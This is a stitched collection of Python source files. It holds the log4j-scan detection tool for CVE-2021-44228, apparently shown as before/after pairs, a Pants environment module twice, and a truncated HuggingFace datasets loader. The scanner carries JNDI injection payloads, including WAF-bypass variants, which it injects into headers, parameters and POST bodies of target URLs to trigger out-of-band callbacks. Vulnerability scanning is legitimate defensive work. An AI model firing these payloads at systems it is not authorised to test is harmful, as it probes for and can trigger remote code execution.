urls = []
if args.url:
urls.append(args.url)
if args.usedlist:
with open(args.usedlist, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
urls.append(i)
dns_callback_host = ""
if args.custom_dns_callback_host:
cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
dns_callback_host = args.custom_dns_callback_host
else:
cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
if args.dns_callback_provider == "interact.sh":
dns_callback = Interactsh()
elif args.dns_callback_provider == "dnslog.cn":
dns_callback = Dnslog()
else:
raise ValueError("Invalid DNS Callback provider")
dns_callback_host = dns_callback.domain
cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta")
for url in urls:
cprint(f"[•] URL: {url}", "magenta")
scan_url(url, dns_callback_host)
if args.custom_dns_callback_host:
cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan")
return
cprint("[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.", "cyan")
cprint("[•] Waiting...", "cyan")
time.sleep(int(args.wait_time))
records = dns_callback.pull_logs()
if len(records) == 0:
cprint("[•] Targets does not seem to be vulnerable.", "green")
else:
cprint("[!!!] Target Affected", "yellow")
for i in records:
cprint(i, "yellow")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)
| #!/usr/bin/env python3
# coding=utf-8
# ******************************************************************
# log4j-scan: A generic scanner for Apache log4j RCE CVE-2021-44228
# Original Author:
# Mazin Ahmed <Mazin at FullHunt.io>
# Modified by Megan Howell (CyberQueenMeg)
# Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
# Secure your Attack Surface with FullHunt.io.
# ******************************************************************
import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
import random
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
if len(sys.argv) <= 1:
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
default_headers = {
'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36',
'Accept': '*/*' # not being tested to allow passing through checks on Accept header in older web-servers
}
post_data_parameters = ["username", "user", "email", "email_address", "password"]
timeout = 4
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}",
"${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}",
]
cve_2021_45046 = [
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
"${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
cve_2021_45105 = [
"$${ctx:loginId}"
]
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-p", "--proxy",
dest="proxy",
help="send requests through proxy",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("--request-type",
dest="request_type",
help="Request Type: (get, post) - [Default: get].",
default="get",
action='store')
parser.add_argument("--headers-file",
dest="headers_file",
help="Headers fuzzing list - [default: headers.txt].",
default="headers.txt",
action='store')
parser.add_argument("--run-all-tests",
dest="run_all_tests",
help="Run all available tests on each URL.",
action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
dest="exclude_user_agent_fuzzing",
help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
action='store_true')
parser.add_argument("--wait-time",
dest="wait_time",
help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
default=5,
type=int,
action='store')
parser.add_argument("--waf-bypass",
dest="waf_bypass_payloads",
help="Extend scans with WAF bypass payloads.",
action='store_true')
parser.add_argument("--test-CVE-2021-45046",
dest="cve_2021_45046",
help="Test using payloads for CVE-2021-45046 (detection payloads).",
action='store_true')
parser.add_argument("--test-CVE-2021-45105",
dest="cve_2021_45105",
help="Test using payloads for CVE-2021-45105 (detection payloads).",
action='store_true')
parser.add_argument("--dns-callback-provider",
dest="dns_callback_provider",
help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
default="interact.sh",
action='store')
parser.add_argument("--custom-dns-callback-host",
dest="custom_dns_callback_host",
help="Custom DNS Callback Host.",
action='store')
parser.add_argument("--disable-http-redirects",
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
action='store_true')
args = parser.parse_args()
proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
def get_fuzzing_headers(payload):
fuzzing_headers = {}
fuzzing_headers.update(default_headers)
with open(args.headers_file, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
fuzzing_headers.update({i: payload})
if args.exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
return fuzzing_headers
def get_fuzzing_post_data(payload):
fuzzing_post_data = {}
for i in post_data_parameters:
fuzzing_post_data.update({i: payload})
return fuzzing_post_data
def generate_waf_bypass_payloads(callback_host, random_string):
payloads = []
for i in waf_bypass_payloads:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2021_45046_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45046:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2021_45105_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45105:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
class Dnslog(object):
def __init__(self):
self.s = requests.session()
req = self.s.get("http://www.dnslog.cn/getdomain.php",
proxies=proxies,
timeout=30)
self.domain = req.text
def pull_logs(self):
req = self.s.get("http://www.dnslog.cn/getrecords.php",
proxies=proxies,
timeout=30)
return req.json()
class Interactsh:
# Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py
def __init__(self, token="", server=""):
rsa = RSA.generate(2048)
self.public_key = rsa.publickey().exportKey()
self.private_key = rsa.exportKey()
self.token = token
self.server = server.lstrip('.') or 'interact.sh'
self.headers = {
"Content-Type": "application/json",
}
if self.token:
self.headers['Authorization'] = self.token
self.secret = str(uuid4())
self.encoded = b64encode(self.public_key).decode("utf8")
guid = uuid4().hex.ljust(33, 'a')
guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
self.domain = f'{guid}.{self.server}'
self.correlation_id = self.domain[:20]
self.session = requests.session()
self.session.headers = self.headers
self.session.verify = False
self.session.proxies = proxies
self.register()
def register(self):
data = {
"public-key": self.encoded,
"secret-key": self.secret,
"correlation-id": self.correlation_id
}
res = self.session.post(
f"https://{self.server}/register", headers=self.headers, json=data, timeout=30)
if 'success' not in res.text:
raise Exception("Can not initiate interact.sh DNS callback client")
def pull_logs(self):
result = []
url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
res = self.session.get(url, headers=self.headers, timeout=30).json()
aes_key, data_list = res['aes_key'], res['data']
for i in data_list:
decrypt_data = self.__decrypt_data(aes_key, i)
result.append(self.__parse_log(decrypt_data))
return result
def __decrypt_data(self, aes_key, data):
private_key = RSA.importKey(self.private_key)
cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256)
aes_plain_key = cipher.decrypt(base64.b64decode(aes_key))
decode = base64.b64decode(data)
bs = AES.block_size
iv = decode[:bs]
cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128)
plain_text = cryptor.decrypt(decode)
return json.loads(plain_text[16:])
def __parse_log(self, log_entry):
new_log_entry = {"timestamp": log_entry["timestamp"],
"host": f'{log_entry["full-id"]}.{self.domain}',
"remote_address": log_entry["remote-address"]
}
return new_log_entry
def parse_url(url):
"""
Parses the URL.
"""
# Url: https://example.com/login.jsp
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# FilePath: /login.jsp
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
return({"scheme": scheme,
"site": f"{scheme}://{urlparse.urlparse(url).netloc}",
"host": urlparse.urlparse(url).netloc.split(":")[0],
"file_path": file_path})
def scan_url(url, callback_host):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
payloads = [payload]
if args.waf_bypass_payloads:
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
if args.cve_2021_45046:
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
if args.request_type.upper() == "GET" or args.run_all_tests:
try:
requests.request(url=url,
method="GET",
params={"v": payload},
headers=get_fuzzing_headers(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
if args.request_type.upper() == "POST" or args.run_all_tests:
try:
# Post body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
data=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
try:
# JSON body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
json=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
def main():
urls = []
if args.url:
urls.append(args.url)
if args.usedlist:
with open(args.usedlist, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
urls.append(i)
dns_callback_host = ""
if args.custom_dns_callback_host:
cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
dns_callback_host = args.custom_dns_callback_host
else:
cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
if args.dns_callback_provider == "interact.sh":
dns_callback = Interactsh()
elif args.dns_callback_provider == "dnslog.cn":
dns_callback = Dnslog()
else:
raise ValueError("Invalid DNS Callback provider")
dns_callback_host = dns_callback.domain
cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta")
for url in urls:
cprint(f"[•] URL: {url}", "magenta")
scan_url(url, dns_callback_host)
if args.custom_dns_callback_host:
cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan")
return
cprint("[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.", "cyan")
cprint("[•] Waiting...", "cyan")
time.sleep(int(args.wait_time))
records = dns_callback.pull_logs()
if len(records) == 0:
cprint("[•] Targets does not seem to be vulnerable.", "green")
else:
cprint("[!!!] Target Affected", "yellow")
for i in records:
cprint(i, "yellow")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import re
from dataclasses import dataclass
from typing import Dict, Mapping, Optional, Sequence
from pants.base.deprecated import deprecated
from pants.util.frozendict import FrozenDict
from pants.util.meta import frozen_after_init
logger = logging.getLogger(__name__)
name_value_re = re.compile(r"([A-Za-z_]\w*)=(.*)")
shorthand_re = re.compile(r"([A-Za-z_]\w*)")
@frozen_after_init
@dataclass(unsafe_hash=True)
class PantsEnvironment:
"""PantsEnvironment is a representation of the environment variables the currently-executing
Pants process was invoked with."""
env: FrozenDict[str, str]
@deprecated(
"2.5.0.dev1",
hint_message="Request a subset Environment (using EnvironmentRequest) or the CompleteEnvironment.",
)
def __init__(self, env: Optional[Mapping[str, str]] = None) -> None:
"""Initialize a `PantsEnvironment` with the current contents of the environment.
Explicitly specify the env argument to create a mock environment for testing.
"""
self.env = FrozenDict(env or {})
def get_subset(
self, requested: Sequence[str], *, allowed: Optional[Sequence[str]] = None
) -> FrozenDict[str, str]:
"""Extract a subset of named env vars.
Given a list of extra environment variable specifiers as strings, filter the contents of
the pants environment to only those variables.
Each variable can be specified either as a name or as a name=value pair.
In the former case, the value for that name is taken from this env. In the latter
case the specified value overrides the value in this env.
If `allowed` is specified, the requested variable names must be in that list, or an error
will be raised.
"""
allowed_set = None if allowed is None else set(allowed)
env_var_subset: Dict[str, str] = {}
def check_and_set(name: str, value: Optional[str]):
if allowed_set is not None and name not in allowed_set:
raise ValueError(
f"{name} is not in the list of variable names that are allowed to be set. "
f"Must be one of {",".join(sorted(allowed_set))}."
)
if value is not None:
env_var_subset[name] = value
for env_var in requested:
name_value_match = name_value_re.match(env_var)
if name_value_match:
check_and_set(name_value_match[1], name_value_match[2])
elif shorthand_re.match(env_var):
check_and_set(env_var, self.env.get(env_var))
else:
raise ValueError(
f"An invalid variable was requested via the --test-extra-env-var "
f"mechanism: {env_var}"
)
return FrozenDict(env_var_subset)
| # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import re
from dataclasses import dataclass
from typing import Dict, Mapping, Optional, Sequence
from pants.base.deprecated import deprecated
from pants.util.frozendict import FrozenDict
from pants.util.meta import frozen_after_init
logger = logging.getLogger(__name__)
name_value_re = re.compile(r"([A-Za-z_]\w*)=(.*)")
shorthand_re = re.compile(r"([A-Za-z_]\w*)")
@frozen_after_init
@dataclass(unsafe_hash=True)
class PantsEnvironment:
"""PantsEnvironment is a representation of the environment variables the currently-executing
Pants process was invoked with."""
env: FrozenDict[str, str]
@deprecated(
"2.5.0.dev1",
hint_message="Request a subset Environment (using EnvironmentRequest) or the CompleteEnvironment.",
)
def __init__(self, env: Optional[Mapping[str, str]] = None) -> None:
"""Initialize a `PantsEnvironment` with the current contents of the environment.
Explicitly specify the env argument to create a mock environment for testing.
"""
self.env = FrozenDict(env or {})
def get_subset(
self, requested: Sequence[str], *, allowed: Optional[Sequence[str]] = None
) -> FrozenDict[str, str]:
"""Extract a subset of named env vars.
Given a list of extra environment variable specifiers as strings, filter the contents of
the pants environment to only those variables.
Each variable can be specified either as a name or as a name=value pair.
In the former case, the value for that name is taken from this env. In the latter
case the specified value overrides the value in this env.
If `allowed` is specified, the requested variable names must be in that list, or an error
will be raised.
"""
allowed_set = None if allowed is None else set(allowed)
env_var_subset: Dict[str, str] = {}
def check_and_set(name: str, value: Optional[str]):
if allowed_set is not None and name not in allowed_set:
raise ValueError(
f"{name} is not in the list of variable names that are allowed to be set. "
f"Must be one of {','.join(sorted(allowed_set))}."
)
if value is not None:
env_var_subset[name] = value
for env_var in requested:
name_value_match = name_value_re.match(env_var)
if name_value_match:
check_and_set(name_value_match[1], name_value_match[2])
elif shorthand_re.match(env_var):
check_and_set(env_var, self.env.get(env_var))
else:
raise ValueError(
f"An invalid variable was requested via the --test-extra-env-var "
f"mechanism: {env_var}"
)
return FrozenDict(env_var_subset)
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Access datasets."""
import filecmp
import importlib
import inspect
import json
import os
import re
import shutil
import time
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Type, Union
from urllib.parse import urlparse
import fsspec
from . import config
from .arrow_dataset import Dataset
from .builder import DatasetBuilder
from .dataset_dict import DatasetDict, IterableDatasetDict
from .features import Features
from .filesystems import extract_path_from_uri, is_remote_filesystem
from .iterable_dataset import IterableDataset
from .metric import Metric
from .packaged_modules import _PACKAGED_DATASETS_MODULES, hash_python_lines
from .splits import Split
from .tasks import TaskTemplate
from .utils.download_manager import GenerateMode
from .utils.file_utils import (
DownloadConfig,
cached_path,
head_hf_s3,
hf_bucket_url,
hf_github_url,
hf_hub_url,
init_hf_modules,
url_or_path_join,
url_or_path_parent,
)
from .utils.filelock import FileLock
from .utils.info_utils import is_small_dataset
from .utils.logging import get_logger
from .utils.version import Version
if config.AIOHTTP_AVAILABLE:
from .streaming import extend_module_for_streaming
logger = get_logger(__name__)
def init_dynamic_modules(
name: str = config.MODULE_NAME_FOR_DYNAMIC_MODULES, hf_modules_cache: Optional[Union[Path, str]] = None
):
"""
Create a module with name `name` in which you can add dynamic modules
such as metrics or datasets. The module can be imported using its name.
The module is created in the HF_MODULE_CACHE directory by default (~/.cache/huggingface/modules) but it can
be overriden by specifying a path to another directory in `hf_modules_cache`.
"""
hf_modules_cache = init_hf_modules(hf_modules_cache)
dynamic_modules_path = os.path.join(hf_modules_cache, name)
os.makedirs(dynamic_modules_path, exist_ok=True)
if not os.path.exists(os.path.join(dynamic_modules_path, "__init__.py")):
with open(os.path.join(dynamic_modules_path, "__init__.py"), "w"):
pass
return dynamic_modules_path
def import_main_class(module_path, dataset=True) -> Optional[Union[Type[DatasetBuilder], Type[Metric]]]:
"""Import a module at module_path and return its main class:
- a DatasetBuilder if dataset is True
- a Metric if dataset is False
"""
module = importlib.import_module(module_path)
if dataset:
main_cls_type = DatasetBuilder
else:
main_cls_type = Metric
# Find the main class in our imported module
module_main_cls = None
for name, obj in module.__dict__.items():
if isinstance(obj, type) and issubclass(obj, main_cls_type):
if inspect.isabstract(obj):
continue
module_main_cls = obj
break
return module_main_cls
def files_to_hash(file_paths: List[str]) -> str:
"""
Convert a list of scripts or text files provided in file_paths into a hashed filename in a repeatable way.
"""
# List all python files in directories if directories are supplied as part of external imports
to_use_files: List[Union[Path, str]] = []
for file_path in file_paths:
if os.path.isdir(file_path):
to_use_files.extend(list(Path(file_path).rglob("*.[pP][yY]")))
else:
to_use_files.append(file_path)
# Get the code from all these files
lines = []
for file_path in to_use_files:
with open(file_path, mode="r", encoding="utf-8") as f:
lines.extend(f.readlines())
return hash_python_lines(lines)
def convert_github_url(url_path: str) -> Tuple[str, Optional[str]]:
"""Convert a link to a file on a github repo in a link to the raw github object."""
parsed = urlparse(url_path)
sub_directory = None
if parsed.scheme in ("http", "https", "s3") and parsed.netloc == "github.com":
if "blob" in url_path:
assert url_path.endswith(
".py"
), f"External import from github at {url_path} should point to a file ending with '.py'"
url_path = url_path.replace("blob", "raw") # Point to the raw file
else:
# Parse github url to point to zip
github_path = parsed.path[1:]
repo_info, branch = github_path.split("/tree/") if "/tree/" in github_path else (github_path, "master")
repo_owner, repo_name = repo_info.split("/")
url_path = "https://github.com/{}/{}/archive/{}.zip".format(repo_owner, repo_name, branch)
sub_directory = f"{repo_name}-{branch}"
return url_path, sub_directory
def get_imports(file_path: str):
r"""Find whether we should import or clone additional files for a given processing script.
And list the import.
We allow:
- library dependencies,
- local dependencies and
- external dependencies whose url is specified with a comment starting from "# From:' followed by the raw url to a file, an archive or a github repository.
external dependencies will be downloaded (and extracted if needed in the dataset folder).
We also add an `__init__.py` to each sub-folder of a downloaded folder so the user can import from them in the script.
Note that only direct import in the dataset processing script will be handled
We don't recursively explore the additional import to download further files.
Examples::
import tensorflow
import .c4_utils
import .clicr.dataset-code.build_json_dataset # From: https://raw.githubusercontent.com/clips/clicr/master/dataset-code/build_json_dataset
"""
lines = []
with open(file_path, mode="r", encoding="utf-8") as f:
lines.extend(f.readlines())
logger.debug("Checking %s for additional imports.", file_path)
imports: List[Tuple[str, str, str, Optional[str]]] = []
is_in_docstring = False
for line in lines:
docstr_start_match = re.findall(r'[\s\S]*?"""[\s\S]*?', line)
if len(docstr_start_match) == 1:
# flip True <=> False only if doctstring
# starts at line without finishing
is_in_docstring = not is_in_docstring
if is_in_docstring:
# import statements in doctstrings should
# not be added as required dependencies
continue
match = re.match(r"^import\s+(\.?)([^\s\.]+)[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)", line, flags=re.MULTILINE)
if match is None:
match = re.match(
r"^from\s+(\.?)([^\s\.]+)(?:[^\s]*)\s+import\s+[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)",
line,
flags=re.MULTILINE,
)
if match is None:
continue
if match.group(1):
# The import starts with a '.', we will download the relevant file
if any(imp[1] == match.group(2) for imp in imports):
# We already have this import
continue
if match.group(3):
# The import has a comment with 'From:', we'll retrieve it from the given url
url_path = match.group(3)
url_path, sub_directory = convert_github_url(url_path)
imports.append(("external", match.group(2), url_path, sub_directory))
elif match.group(2):
# The import should be at the same place as the file
imports.append(("internal", match.group(2), match.group(2), None))
else:
if match.group(3):
# The import has a comment with `From: git+https:...`, asks user to pip install from git.
url_path = match.group(3)
imports.append(("library", match.group(2), url_path, None))
else:
imports.append(("library", match.group(2), match.group(2), None))
return imports
def prepare_module(
path: str,
script_version: Optional[Union[str, Version]] = None,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
dataset: bool = True,
force_local_path: Optional[str] = None,
dynamic_modules_path: Optional[str] = None,
return_resolved_file_path: bool = False,
**download_kwargs,
) -> Union[Tuple[str, str], Tuple[str, str, Optional[str]]]:
r"""
Download/extract/cache a dataset (if dataset==True) or a metric (if dataset==False)
Dataset and metrics codes are cached inside the the dynamic modules cache to allow easy import (avoid ugly sys.path tweaks)
and using cloudpickle (among other things).
Args:
path (str):
path to the dataset or metric script, can be either:
- a path to a local directory containing the dataset processing python script
- an url to a github or S3 directory with a dataset processing python script
script_version (Optional ``Union[str, datasets.Version]``):
If specified, the module will be loaded from the datasets repository at this version.
By default:
- it is set to the local version fo the lib.
- it will also try to load it from the master branch if it's not available at the local version fo the lib.
Specifying a version that is different from your local version of the lib might cause compatibility issues.
download_config (Optional ``datasets.DownloadConfig``: specific download configuration parameters.
dataset (bool): True if the script to load is a dataset, False if the script is a metric.
force_local_path (Optional str): Optional path to a local path to download and prepare the script to.
Used to inspect or modify the script folder.
dynamic_modules_path (Optional str, defaults to HF_MODULES_CACHE / "datasets_modules", i.e. ~/.cache/huggingface/modules/datasets_modules):
Optional path to the directory in which the dynamic modules are saved. It must have been initialized with :obj:`init_dynamic_modules`.
By default the datasets and metrics are stored inside the `datasets_modules` module.
return_resolved_file_path (Optional bool, defaults to False):
If True, the url or path to the resolved dataset or metric script is returned with the other ouputs
download_kwargs: optional attributes for DownloadConfig() which will override the attributes in download_config if supplied.
Return: Tuple[``str``, ``str``] with
1. The module path being
- the import path of the dataset/metric package if force_local_path is False: e.g. 'datasets.datasets.squad'
- the local path to the dataset/metric file if force_local_path is True: e.g. '/User/huggingface/datasets/datasets/squad/squad.py'
2. A hash string computed from the content of the dataset loading script.
"""
if download_config is None:
download_config = DownloadConfig(**download_kwargs)
download_config.extract_compressed_file = True
download_config.force_extract = True
module_type = "dataset" if dataset else "metric"
name = list(filter(lambda x: x, path.replace(os.sep, "/").split("/")))[-1]
if not name.endswith(".py"):
name = name + ".py"
# Short name is name without the '.py' at the end (for the module)
short_name = name[:-3]
# first check if the module is packaged with the `datasets` package
if dataset and path in _PACKAGED_DATASETS_MODULES:
try:
head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
except Exception:
logger.debug(f"Couldn't head HF s3 for packaged dataset module '{path}'. Running in offline mode.")
module_path, hash = _PACKAGED_DATASETS_MODULES[path]
if return_resolved_file_path:
return module_path, hash, None
return module_path, hash
# otherwise the module is added to the dynamic modules
dynamic_modules_path = dynamic_modules_path if dynamic_modules_path else init_dynamic_modules()
module_name_for_dynamic_modules = os.path.basename(dynamic_modules_path)
datasets_modules_path = os.path.join(dynamic_modules_path, "datasets")
datasets_modules_name = module_name_for_dynamic_modules + ".datasets"
metrics_modules_path = os.path.join(dynamic_modules_path, "metrics")
metrics_modules_name = module_name_for_dynamic_modules + ".metrics"
if force_local_path is None:
main_folder_path = os.path.join(datasets_modules_path if dataset else metrics_modules_path, short_name)
else:
main_folder_path = force_local_path
# We have three ways to find the processing file:
# - if os.path.join(path, name) is a file or a remote url
# - if path is a file or a remote url
# - otherwise we assume path/name is a path to our S3 bucket
combined_path = os.path.join(path, name)
if os.path.isfile(combined_path):
file_path = combined_path
local_path = file_path
elif os.path.isfile(path):
file_path = path
local_path = path
else:
# Try github (canonical datasets/metrics) and then S3 (users datasets/metrics)
try:
head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
script_version = str(script_version) if script_version is not None else None
if path.count("/") == 0: # canonical datasets/metrics: github path
file_path = hf_github_url(path=path, name=name, dataset=dataset, version=script_version)
try:
local_path = cached_path(file_path, download_config=download_config)
except FileNotFoundError:
if script_version is not None:
raise FileNotFoundError(
"Couldn't find remote file with version {} at {}. Please provide a valid version and a valid {} name".format(
script_version, file_path, "dataset" if dataset else "metric"
)
)
else:
github_file_path = file_path
file_path = hf_github_url(path=path, name=name, dataset=dataset, version="master")
try:
local_path = cached_path(file_path, download_config=download_config)
logger.warning(
"Couldn't find file locally at {}, or remotely at {}.\n"
"The file was picked from the master branch on github instead at {}.".format(
combined_path, github_file_path, file_path
)
)
except FileNotFoundError:
raise FileNotFoundError(
"Couldn't find file locally at {}, or remotely at {}.\n"
"The file is also not present on the master branch on github.".format(
combined_path, github_file_path
)
)
elif path.count("/") == 1: # users datasets/metrics: s3 path (hub for datasets and s3 for metrics)
if dataset:
file_path = hf_hub_url(path=path, name=name, version=script_version)
else:
file_path = hf_bucket_url(path, filename=name, dataset=False)
try:
local_path = cached_path(file_path, download_config=download_config)
except FileNotFoundError:
raise FileNotFoundError(
"Couldn't find file locally at {}, or remotely at {}. Please provide a valid {} name".format(
combined_path, file_path, "dataset" if dataset else "metric"
)
)
else:
raise FileNotFoundError(
"Couldn't find file locally at {}. Please provide a valid {} name".format(
combined_path, "dataset" if dataset else "metric"
)
)
except Exception as e: # noqa: all the attempts failed, before raising the error we should check if the module already exists.
if os.path.isdir(main_folder_path):
hashes = [h for h in os.listdir(main_folder_path) if len(h) == 64]
if hashes:
# get most recent
def _get_modification_time(module_hash):
return (Path(main_folder_path) / module_hash / name).stat().st_mtime
hash = sorted(hashes, key=_get_modification_time)[-1]
module_path = ".".join(
[datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
)
logger.warning(
f"Using the latest cached version of the module from {os.path.join(main_folder_path, hash)} "
f"(last modified on {time.ctime(_get_modification_time(hash))}) since it "
f"couldn't be found locally at {combined_path} or remotely ({type(e).__name__})."
)
if return_resolved_file_path:
with open(os.path.join(main_folder_path, hash, short_name + ".json")) as cache_metadata:
file_path = json.load(cache_metadata)["original file path"]
return module_path, hash, file_path
return module_path, hash
raise
# Load the module in two steps:
# 1. get the processing file on the local filesystem if it's not there (download to cache dir)
# 2. copy from the local file system inside the modules cache to import it
base_path = url_or_path_parent(file_path) # remove the filename
dataset_infos = url_or_path_join(base_path, config.DATASETDICT_INFOS_FILENAME)
# Download the dataset infos file if available
try:
local_dataset_infos_path = cached_path(
dataset_infos,
download_config=download_config,
)
except (FileNotFoundError, ConnectionError):
local_dataset_infos_path = None
# Download external imports if needed
imports = get_imports(local_path)
local_imports = []
library_imports = []
for import_type, import_name, import_path, sub_directory in imports:
if import_type == "library":
library_imports.append((import_name, import_path)) # Import from a library
continue
if import_name == short_name:
raise ValueError(
f"Error in {module_type} script at {file_path}, importing relative {import_name} module "
f"but {import_name} is the name of the {module_type} script. "
f"Please change relative import {import_name} to another name and add a '# From: URL_OR_PATH' "
f"comment pointing to the original realtive import file path."
)
if import_type == "internal":
url_or_filename = url_or_path_join(base_path, import_path + ".py")
elif import_type == "external":
url_or_filename = import_path
else:
raise ValueError("Wrong import_type")
local_import_path = cached_path(
url_or_filename,
download_config=download_config,
)
if sub_directory is not None:
local_import_path = os.path.join(local_import_path, sub_directory)
local_imports.append((import_name, local_import_path))
# Check library imports
needs_to_be_installed = []
